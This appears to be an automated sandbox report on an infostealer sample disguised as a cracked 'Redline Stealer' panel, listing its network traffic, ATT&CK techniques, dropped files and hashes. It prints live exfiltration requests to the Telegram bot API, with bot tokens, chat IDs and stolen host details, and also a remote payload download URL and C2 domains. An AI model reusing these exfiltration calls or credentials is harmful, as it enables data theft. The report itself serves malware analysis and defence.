Content-Security-Policy: script-src 'report-sample' 'nonce--zPgd92uhCKbFXuJ275M5g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-platform=*, ch-ua-platform-version=*
Server: ESF
X-XSS-Protection: 0
X-Content-Type-Options: nosniff
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Accept-Ranges: none
Vary: Accept-Encoding
Transfer-Encoding: chunked
GET

https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download

Synaptics.exe

Remote address:

142.250.179.174:443

Request

GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
User-Agent: Synaptics.exe
Host: docs.google.com
Cache-Control: no-cache

Response

HTTP/1.1 404 Not Found

Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Mon, 24 Apr 2023 15:41:33 GMT
Strict-Transport-Security: max-age=31536000
Cross-Origin-Opener-Policy: same-origin
Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
Content-Security-Policy: script-src 'report-sample' 'nonce-g4bQFq5nMHro0yoK6zgR_A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-platform=*, ch-ua-platform-version=*
Server: ESF
X-XSS-Protection: 0
X-Content-Type-Options: nosniff
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Accept-Ranges: none
Vary: Accept-Encoding
Transfer-Encoding: chunked
DNS

174.179.250.142.in-addr.arpa

Remote address:

8.8.8.8:53

Request

174.179.250.142.in-addr.arpa

IN PTR

Response

174.179.250.142.in-addr.arpa

IN PTR

ams15s41-in-f141e100net
DNS

254.1.248.8.in-addr.arpa

Remote address:

8.8.8.8:53

Request

254.1.248.8.in-addr.arpa

IN PTR

Response
DNS

35.36.251.142.in-addr.arpa

Remote address:

8.8.8.8:53

Request

35.36.251.142.in-addr.arpa

IN PTR

Response

35.36.251.142.in-addr.arpa

IN PTR

ams17s12-in-f31e100net

174.128.246.100:80

http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978

http

Synaptics.exe

568 B
535 B
9
7

HTTP Request

GET http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978

HTTP Response

200
104.18.114.97:80

http://icanhazip.com/

http

._cache_Panel 24.2.exe

339 B
727 B
6
4

HTTP Request

GET http://icanhazip.com/

HTTP Response

200
172.67.196.114:443

https://api.mylnikov.org/geolocation/wifi?v=1.1&bssid=1a:88:bb:2b:5e:be

tls, http

._cache_Panel 24.2.exe

808 B
4.1kB
9
8

HTTP Request

GET https://api.mylnikov.org/geolocation/wifi?v=1.1&bssid=1a:88:bb:2b:5e:be

HTTP Response

200
149.154.167.220:443

https://api.telegram.org/bot6093966625:AAHk4dddHb8B1faCcFqL3um1gmB-f2mWhyc/sendMessage?chat_id=5529838804&text=%F0%9F%93%81%20Uploading%20Log%20Folders...

tls, http

._cache_Panel 24.2.exe

2.7kB
9.6kB
14
15

HTTP Request

GET https://api.telegram.org/bot6093966625:AAHk4dddHb8B1faCcFqL3um1gmB-f2mWhyc/sendMessage?chat_id=5529838804&text=%0A%20%20%F0%9F%8C%AA%20*WorldWind%20Stealer%202.0.4%20-%20Results:*%0ADate:%202023-04-24%205:40:33%20PM%0ASystem:%20Windows%2010%20Pro%20(64%20Bit)%0AUsername:%20Admin%0ACompName:%20EIEEIFYE%0ALanguage:%20%F0%9F%87%BA%F0%9F%87%B8%20en-US%0AAntivirus:%20Not%20installed%0A%0A%20%20%F0%9F%92%BB%20*Hardware:*%0ACPU:%2012th%20Gen%20Intel(R)%20Core(TM)%20i5-12400%0AGPU:%20Microsoft%20Basic%20Display%20Adapter%0ARAM:%2016154MB%0AHWID:%20078BFBFF000306D2%0APower:%20NoSystemBattery%20(1%25)%0AScreen:%201280x720%0A%0A%20%20%F0%9F%93%A1%20*Network:*%20%0AGateway%20IP:%2010.127.0.1%0AInternal%20IP:%2010.127.0.21%0AExternal%20IP:%20154.61.71.13%0ABSSID:%201a:88:bb:2b:5e:be%0A%0A%20%20%F0%9F%92%B8%20*Domains%20info:*%0A%20%20%20%E2%88%9F%20%F0%9F%8F%A6%20*Bank%20Logs*%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%92%B0%20*Crypto%20Logs*%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%8D%93%20*Freaky%20Logs*%20(No%20data)%0A%0A%20%20%F0%9F%8C%90%20*Logs:*%0A%20%20%20%E2%88%9F%20%F0%9F%94%96%20Bookmarks:%205%0A%0A%20%20%F0%9F%97%83%20*Software:*%0A%0A%20%20%F0%9F%A7%AD%20*Device:*%0A%20%20%20%E2%88%9F%20%F0%9F%97%9D%20Windows%20product%20key%0A%20%20%20%E2%88%9F%20%F0%9F%8C%83%20Desktop%20screenshot%0A%0A%20%20%F0%9F%93%84%20*File%20Grabber:*%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Database%20files:%206%0A%0A%20%20Contact%20Developer:%20@FlatLineStealer%0A%20%20%20Join%20The%20Telegram%20Channel:%20@CashOutGangTalk&parse_mode=Markdown&disable_web_page_preview=True

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot6093966625:AAHk4dddHb8B1faCcFqL3um1gmB-f2mWhyc/sendMessage?chat_id=5529838804&text=%F0%9F%93%81%20Uploading%20Log%20Folders...

HTTP Response

200
149.154.167.220:443

https://api.telegram.org/bot6093966625:AAHk4dddHb8B1faCcFqL3um1gmB-f2mWhyc/sendDocument?chat_id=5529838804

tls, http

._cache_Panel 24.2.exe

85.9kB
8.1kB
78
33

HTTP Request

POST https://api.telegram.org/bot6093966625:AAHk4dddHb8B1faCcFqL3um1gmB-f2mWhyc/sendDocument?chat_id=5529838804

HTTP Response

200
149.154.167.220:443

https://api.telegram.org/bot1119746739:AAGMhvpUjXI4CzIfizRC--VXilxnkJlhaf8/sendDocument?chat_id=1096425866

tls, http

._cache_Panel 24.2.exe

100.7kB
8.1kB
82
31

HTTP Request

POST https://api.telegram.org/bot1119746739:AAGMhvpUjXI4CzIfizRC--VXilxnkJlhaf8/sendDocument?chat_id=1096425866

HTTP Response

200
127.0.0.1:6606

._cache_Panel 24.2.exe
127.0.0.1:8808

._cache_Panel 24.2.exe
127.0.0.1:6606

._cache_Panel 24.2.exe
127.0.0.1:6606

._cache_Panel 24.2.exe
127.0.0.1:6606

._cache_Panel 24.2.exe
127.0.0.1:6606

._cache_Panel 24.2.exe
127.0.0.1:6606

._cache_Panel 24.2.exe
142.250.179.174:443

https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download

tls, http

Synaptics.exe

2.0kB
17.0kB
26
24

HTTP Request

GET https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download

HTTP Response

404

HTTP Request

GET https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download

HTTP Response

404

HTTP Request

GET https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download

HTTP Response

404
127.0.0.1:6606

._cache_Panel 24.2.exe
127.0.0.1:6606

._cache_Panel 24.2.exe
127.0.0.1:6606

._cache_Panel 24.2.exe
127.0.0.1:8808

._cache_Panel 24.2.exe
127.0.0.1:6606

._cache_Panel 24.2.exe
127.0.0.1:8808

._cache_Panel 24.2.exe
127.0.0.1:7707

._cache_Panel 24.2.exe
127.0.0.1:6606

._cache_Panel 24.2.exe
127.0.0.1:7707

._cache_Panel 24.2.exe
127.0.0.1:7707

._cache_Panel 24.2.exe
127.0.0.1:6606

._cache_Panel 24.2.exe
127.0.0.1:7707

._cache_Panel 24.2.exe
127.0.0.1:7707

._cache_Panel 24.2.exe
127.0.0.1:6606

._cache_Panel 24.2.exe

8.8.8.8:53

xred.mooo.com

dns

Synaptics.exe

59 B
118 B
1
1

DNS Request

xred.mooo.com
8.8.8.8:53

freedns.afraid.org

dns

Synaptics.exe

64 B
80 B
1
1

DNS Request

freedns.afraid.org

DNS Response

174.128.246.100
8.8.8.8:53

0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.8.0.8.0.8.0.8.0.ip6.arpa

dns

118 B
182 B
1
1

DNS Request

0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.8.0.8.0.8.0.8.0.ip6.arpa
8.8.8.8:53

100.246.128.174.in-addr.arpa

dns

74 B
74 B
1
1

DNS Request

100.246.128.174.in-addr.arpa
8.8.8.8:53

52.4.107.13.in-addr.arpa

dns

70 B
156 B
1
1

DNS Request

52.4.107.13.in-addr.arpa
8.8.8.8:53

icanhazip.com

dns

._cache_Panel 24.2.exe

59 B
91 B
1
1

DNS Request

icanhazip.com

DNS Response

104.18.114.97

104.18.115.97
8.8.8.8:53

api.mylnikov.org

dns

._cache_Panel 24.2.exe

62 B
94 B
1
1

DNS Request

api.mylnikov.org

DNS Response

172.67.196.114

104.21.44.66
8.8.8.8:53

api.telegram.org

dns

._cache_Panel 24.2.exe

62 B
78 B
1
1

DNS Request

api.telegram.org

DNS Response

149.154.167.220
8.8.8.8:53

97.114.18.104.in-addr.arpa

dns

72 B
134 B
1
1

DNS Request

97.114.18.104.in-addr.arpa
8.8.8.8:53

114.196.67.172.in-addr.arpa

dns

73 B
135 B
1
1

DNS Request

114.196.67.172.in-addr.arpa
8.8.8.8:53

220.167.154.149.in-addr.arpa

dns

74 B
167 B
1
1

DNS Request

220.167.154.149.in-addr.arpa
8.8.8.8:53

233.141.123.20.in-addr.arpa

dns

73 B
159 B
1
1

DNS Request

233.141.123.20.in-addr.arpa
8.8.8.8:53

docs.google.com

dns

Synaptics.exe

61 B
77 B
1
1

DNS Request

docs.google.com

DNS Response

142.250.179.174
8.8.8.8:53

174.179.250.142.in-addr.arpa

dns

74 B
113 B
1
1

DNS Request

174.179.250.142.in-addr.arpa
8.8.8.8:53

254.1.248.8.in-addr.arpa

dns

70 B
124 B
1
1

DNS Request

254.1.248.8.in-addr.arpa
8.8.8.8:53

35.36.251.142.in-addr.arpa

dns

72 B
110 B
1
1

DNS Request

35.36.251.142.in-addr.arpa

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Synaptics\Synaptics.exe

Filesize
923KB

MD5
ad5e1454eb96c012755dcab90cfd69cf

SHA1
17f93458b223542eed1c269d9c64b8c39341b1cd

SHA256
726725262283f68ec3e3f62d13863c7df9b08f54e19c28603407d98631468494

SHA512
1f503e6619ff5cd87838b4618400ae54c24d5f618813cfd8ce7ecdd53f25d74186dda096a1a2ab49848184e22137c05de0fbf010a0ccc9adcc5b58e727da1d46

Download Submit
C:\ProgramData\Synaptics\Synaptics.exe

Filesize
923KB

MD5
ad5e1454eb96c012755dcab90cfd69cf

SHA1
17f93458b223542eed1c269d9c64b8c39341b1cd

SHA256
726725262283f68ec3e3f62d13863c7df9b08f54e19c28603407d98631468494

SHA512
1f503e6619ff5cd87838b4618400ae54c24d5f618813cfd8ce7ecdd53f25d74186dda096a1a2ab49848184e22137c05de0fbf010a0ccc9adcc5b58e727da1d46

Download Submit
C:\ProgramData\Synaptics\Synaptics.exe

Filesize
923KB

MD5
ad5e1454eb96c012755dcab90cfd69cf

SHA1
17f93458b223542eed1c269d9c64b8c39341b1cd

SHA256
726725262283f68ec3e3f62d13863c7df9b08f54e19c28603407d98631468494

SHA512
1f503e6619ff5cd87838b4618400ae54c24d5f618813cfd8ce7ecdd53f25d74186dda096a1a2ab49848184e22137c05de0fbf010a0ccc9adcc5b58e727da1d46

Download Submit
C:\Users\Admin\AppData\Local\9d79dc18a202273d5066ba7ce1c0ed35\Admin@EIEEIFYE_en-US\Browsers\Firefox\Bookmarks.txt

Filesize
105B

MD5
2e9d094dda5cdc3ce6519f75943a4ff4

SHA1
5d989b4ac8b699781681fe75ed9ef98191a5096c

SHA256
c84c98bbf5e0ef9c8d0708b5d60c5bb656b7d6be5135d7f7a8d25557e08cf142

SHA512
d1f7eed00959e902bdb2125b91721460d3ff99f3bdfc1f2a343d4f58e8d4e5e5a06c0c6cdc0379211c94510f7c00d7a8b34fa7d0ca0c3d54cbbe878f1e9812b7

Download Submit
C:\Users\Admin\AppData\Local\9d79dc18a202273d5066ba7ce1c0ed35\Admin@EIEEIFYE_en-US\Grabber\DRIVE-C\Users\Admin\Documents\desktop.ini

Filesize
402B

MD5
ecf88f261853fe08d58e2e903220da14

SHA1
f72807a9e081906654ae196605e681d5938a2e6c

SHA256
cafec240d998e4b6e92ad1329cd417e8e9cbd73157488889fd93a542de4a4844

SHA512
82c1c3dd163fbf7111c7ef5043b009dafc320c0c5e088dec16c835352c5ffb7d03c5829f65a9ff1dc357bae97e8d2f9c3fc1e531fe193e84811fb8c62888a36b

Download Submit
C:\Users\Admin\AppData\Local\9d79dc18a202273d5066ba7ce1c0ed35\Admin@EIEEIFYE_en-US\Grabber\DRIVE-C\Users\Admin\Documents\desktop.ini

Filesize
402B

MD5
ecf88f261853fe08d58e2e903220da14

SHA1
f72807a9e081906654ae196605e681d5938a2e6c

SHA256
cafec240d998e4b6e92ad1329cd417e8e9cbd73157488889fd93a542de4a4844

SHA512
82c1c3dd163fbf7111c7ef5043b009dafc320c0c5e088dec16c835352c5ffb7d03c5829f65a9ff1dc357bae97e8d2f9c3fc1e531fe193e84811fb8c62888a36b

Download Submit
C:\Users\Admin\AppData\Local\9d79dc18a202273d5066ba7ce1c0ed35\Admin@EIEEIFYE_en-US\Grabber\DRIVE-C\Users\Admin\Downloads\desktop.ini

Filesize
282B

MD5
3a37312509712d4e12d27240137ff377

SHA1
30ced927e23b584725cf16351394175a6d2a9577

SHA256
b029393ea7b7cf644fb1c9f984f57c1980077562ee2e15d0ffd049c4c48098d3

SHA512
dbb9abe70f8a781d141a71651a62a3a743c71a75a8305e9d23af92f7307fb639dc4a85499115885e2a781b040cbb7613f582544c2d6de521e588531e9c294b05

Download Submit
C:\Users\Admin\AppData\Local\9d79dc18a202273d5066ba7ce1c0ed35\Admin@EIEEIFYE_en-US\Grabber\DRIVE-C\Users\Admin\Downloads\desktop.ini

Filesize
282B

MD5
3a37312509712d4e12d27240137ff377

SHA1
30ced927e23b584725cf16351394175a6d2a9577

SHA256
b029393ea7b7cf644fb1c9f984f57c1980077562ee2e15d0ffd049c4c48098d3

SHA512
dbb9abe70f8a781d141a71651a62a3a743c71a75a8305e9d23af92f7307fb639dc4a85499115885e2a781b040cbb7613f582544c2d6de521e588531e9c294b05

Download Submit
C:\Users\Admin\AppData\Local\9d79dc18a202273d5066ba7ce1c0ed35\Admin@EIEEIFYE_en-US\Grabber\DRIVE-C\Users\Admin\Pictures\Camera Roll\desktop.ini

Filesize
190B

MD5
d48fce44e0f298e5db52fd5894502727

SHA1
fce1e65756138a3ca4eaaf8f7642867205b44897

SHA256
231a08caba1f9ba9f14bd3e46834288f3c351079fcedda15e391b724ac0c7ea8

SHA512
a1c0378db4e6dac9a8638586f6797bad877769d76334b976779cd90324029d755fb466260ef27bd1e7f9fdf97696cd8cd1318377970a1b5bf340efb12a4feb4a

Download Submit
C:\Users\Admin\AppData\Local\9d79dc18a202273d5066ba7ce1c0ed35\Admin@EIEEIFYE_en-US\Grabber\DRIVE-C\Users\Admin\Pictures\Camera Roll\desktop.ini

Filesize
190B

MD5
d48fce44e0f298e5db52fd5894502727

SHA1
fce1e65756138a3ca4eaaf8f7642867205b44897

SHA256
231a08caba1f9ba9f14bd3e46834288f3c351079fcedda15e391b724ac0c7ea8

SHA512
a1c0378db4e6dac9a8638586f6797bad877769d76334b976779cd90324029d755fb466260ef27bd1e7f9fdf97696cd8cd1318377970a1b5bf340efb12a4feb4a

Download Submit
C:\Users\Admin\AppData\Local\9d79dc18a202273d5066ba7ce1c0ed35\Admin@EIEEIFYE_en-US\Grabber\DRIVE-C\Users\Admin\Pictures\Saved Pictures\desktop.ini

Filesize
190B

MD5
87a524a2f34307c674dba10708585a5e

SHA1
e0508c3f1496073b9f6f9ecb2fb01cb91f9e8201

SHA256
d01a7ef6233ef4ab3ea7210c0f2837931d334a20ae4d2a05ed03291e59e576c9

SHA512
7cfa6d47190075e1209fb081e36ed7e50e735c9682bfb482dbf5a36746abdad0dccfdb8803ef5042e155e8c1f326770f3c8f7aa32ce66cf3b47cd13781884c38

Download Submit
C:\Users\Admin\AppData\Local\9d79dc18a202273d5066ba7ce1c0ed35\Admin@EIEEIFYE_en-US\Grabber\DRIVE-C\Users\Admin\Pictures\Saved Pictures\desktop.ini

Filesize
190B

MD5
87a524a2f34307c674dba10708585a5e

SHA1
e0508c3f1496073b9f6f9ecb2fb01cb91f9e8201

SHA256
d01a7ef6233ef4ab3ea7210c0f2837931d334a20ae4d2a05ed03291e59e576c9

SHA512
7cfa6d47190075e1209fb081e36ed7e50e735c9682bfb482dbf5a36746abdad0dccfdb8803ef5042e155e8c1f326770f3c8f7aa32ce66cf3b47cd13781884c38

Download Submit
C:\Users\Admin\AppData\Local\9d79dc18a202273d5066ba7ce1c0ed35\Admin@EIEEIFYE_en-US\Grabber\DRIVE-C\Users\Admin\Pictures\desktop.ini

Filesize
504B

MD5
29eae335b77f438e05594d86a6ca22ff

SHA1
d62ccc830c249de6b6532381b4c16a5f17f95d89

SHA256
88856962cef670c087eda4e07d8f78465beeabb6143b96bd90f884a80af925b4

SHA512
5d2d05403b39675b9a751c8eed4f86be58cb12431afec56946581cb116b9ae1014ab9334082740be5b4de4a25e190fe76de071ef1b9074186781477919eb3c17

Download Submit
C:\Users\Admin\AppData\Local\9d79dc18a202273d5066ba7ce1c0ed35\Admin@EIEEIFYE_en-US\Grabber\DRIVE-C\Users\Admin\Pictures\desktop.ini

Filesize
504B

MD5
29eae335b77f438e05594d86a6ca22ff

SHA1
d62ccc830c249de6b6532381b4c16a5f17f95d89

SHA256
88856962cef670c087eda4e07d8f78465beeabb6143b96bd90f884a80af925b4

SHA512
5d2d05403b39675b9a751c8eed4f86be58cb12431afec56946581cb116b9ae1014ab9334082740be5b4de4a25e190fe76de071ef1b9074186781477919eb3c17

Download Submit
C:\Users\Admin\AppData\Local\9d79dc18a202273d5066ba7ce1c0ed35\Admin@EIEEIFYE_en-US\System\Process.txt

Filesize
4KB

MD5
ec9d756f324c7e434b7742f7438c73d7

SHA1
48bf297485878e9d4d422083154139ae48469f26

SHA256
8700aae650d4b82e73c57e178a99baac7b28def52ad9c8ade4f30f8f7c3c32c5

SHA512
2b583d87c7a3cd7f9143ea25b55ae778d17be095a102e99bd4f773bdf1d4ef2fc7833f8841a1c4c3f502e8b436a3f3e1ef5a3eda0a46cf8feda8103c518381d1

Download Submit
C:\Users\Admin\AppData\Local\Temp\Redline Stealer v24.2 cracked [XT_CH]\Panel\RedLine_24_2\Panel\._cache_Panel 24.2.exe

Filesize
170KB

MD5
470a8267b5eba7eb998d9fa69532f849

SHA1
1152ddb2ab93aae9983e3e8b5c4f367875323e3e

SHA256
6cdb8d1af85d10ed3022ae0a183e3e9dff0ad1bc4a90915e7e41b600154a349e

SHA512
5f151230dc97e0804cbe7b36ce9a4570023bdaf0283ae2681732a835c26e540ec93f9c56cd78599c8deeeaed10b2b50f9c976c85ad95d4e36460e05083f7048d

Download Submit
C:\Users\Admin\AppData\Local\Temp\Redline Stealer v24.2 cracked [XT_CH]\Panel\RedLine_24_2\Panel\._cache_Panel 24.2.exe

Filesize
170KB

MD5
470a8267b5eba7eb998d9fa69532f849

SHA1
1152ddb2ab93aae9983e3e8b5c4f367875323e3e

SHA256
6cdb8d1af85d10ed3022ae0a183e3e9dff0ad1bc4a90915e7e41b600154a349e

SHA512
5f151230dc97e0804cbe7b36ce9a4570023bdaf0283ae2681732a835c26e540ec93f9c56cd78599c8deeeaed10b2b50f9c976c85ad95d4e36460e05083f7048d

Download Submit
C:\Users\Admin\AppData\Local\Temp\Redline Stealer v24.2 cracked [XT_CH]\Panel\RedLine_24_2\Panel\._cache_Panel 24.2.exe

Filesize
170KB

MD5
470a8267b5eba7eb998d9fa69532f849

SHA1
1152ddb2ab93aae9983e3e8b5c4f367875323e3e

SHA256
6cdb8d1af85d10ed3022ae0a183e3e9dff0ad1bc4a90915e7e41b600154a349e

SHA512
5f151230dc97e0804cbe7b36ce9a4570023bdaf0283ae2681732a835c26e540ec93f9c56cd78599c8deeeaed10b2b50f9c976c85ad95d4e36460e05083f7048d

Download Submit
C:\Users\Admin\AppData\Local\Temp\Redline Stealer v24.2 cracked [XT_CH]\Panel\RedLine_24_2\Panel\._cache_Synaptics.exe

Filesize
170KB

MD5
470a8267b5eba7eb998d9fa69532f849

SHA1
1152ddb2ab93aae9983e3e8b5c4f367875323e3e

SHA256
6cdb8d1af85d10ed3022ae0a183e3e9dff0ad1bc4a90915e7e41b600154a349e

SHA512
5f151230dc97e0804cbe7b36ce9a4570023bdaf0283ae2681732a835c26e540ec93f9c56cd78599c8deeeaed10b2b50f9c976c85ad95d4e36460e05083f7048d

Download Submit
C:\Users\Admin\AppData\Local\Temp\Redline Stealer v24.2 cracked [XT_CH]\Panel\RedLine_24_2\Panel\._cache_Synaptics.exe

Filesize
170KB

MD5
470a8267b5eba7eb998d9fa69532f849

SHA1
1152ddb2ab93aae9983e3e8b5c4f367875323e3e

SHA256
6cdb8d1af85d10ed3022ae0a183e3e9dff0ad1bc4a90915e7e41b600154a349e

SHA512
5f151230dc97e0804cbe7b36ce9a4570023bdaf0283ae2681732a835c26e540ec93f9c56cd78599c8deeeaed10b2b50f9c976c85ad95d4e36460e05083f7048d

Download Submit
C:\Users\Admin\AppData\Local\ae75c027dba62f1fcd7c912bb34dce96\msgid.dat

Filesize
2B

MD5
7647966b7343c29048673252e490f736

SHA1
16b06bd9b738835e2d134fe8d596e9ab0086a985

SHA256
cd70bea023f752a0564abb6ed08d42c1440f2e33e29914e55e0be1595e24f45a

SHA512
a3f1d1838dfbe3d28a3b5eb40c36c175c051d2eafe9f6a3dd714ca0d221754a91c016cf93cba110bcd09848287dbd7ec0dee3f676c588f830af33b45d845573c

Download Submit
memory/2080-237-0x0000000005090000-0x00000000050A0000-memory.dmp

Filesize
64KB

Download
memory/2080-294-0x00000000052A0000-0x0000000005306000-memory.dmp

Filesize
408KB

Download
memory/2080-460-0x0000000005090000-0x00000000050A0000-memory.dmp

Filesize
64KB

Download
memory/2080-384-0x0000000005090000-0x00000000050A0000-memory.dmp

Filesize
64KB

Download
memory/2080-423-0x0000000005E60000-0x0000000005EF2000-memory.dmp

Filesize
584KB

Download
memory/2080-424-0x0000000006400000-0x00000000068FE000-memory.dmp

Filesize
5.0MB

Download
memory/2080-428-0x0000000005F60000-0x0000000005F6A000-memory.dmp

Filesize
40KB

Download
memory/2080-236-0x0000000000740000-0x0000000000770000-memory.dmp

Filesize
192KB

Download
memory/2080-434-0x0000000006D00000-0x0000000006D12000-memory.dmp

Filesize
72KB

Download
memory/3148-293-0x0000000004AF0000-0x0000000004B00000-memory.dmp

Filesize
64KB

Download
memory/3148-413-0x0000000004AF0000-0x0000000004B00000-memory.dmp

Filesize
64KB

Download
memory/3168-385-0x0000000000670000-0x0000000000671000-memory.dmp

Filesize
4KB

Download
memory/3168-238-0x0000000000670000-0x0000000000671000-memory.dmp

Filesize
4KB

Download
memory/3168-383-0x0000000000400000-0x00000000004ED000-memory.dmp

Filesize
948KB

Download
memory/3168-483-0x0000000000400000-0x00000000004ED000-memory.dmp

Filesize
948KB

Download
memory/3980-121-0x0000000002330000-0x0000000002331000-memory.dmp

Filesize
4KB

Download
memory/3980-234-0x0000000000400000-0x00000000004ED000-memory.dmp

Filesize
948KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

DNS Request

DNS Request

DNS Response

DNS Request

DNS Request

DNS Request

DNS Request

DNS Response

DNS Request

DNS Response

DNS Request

DNS Response

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Response

DNS Request

DNS Request

DNS Request

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

We care about your privacy.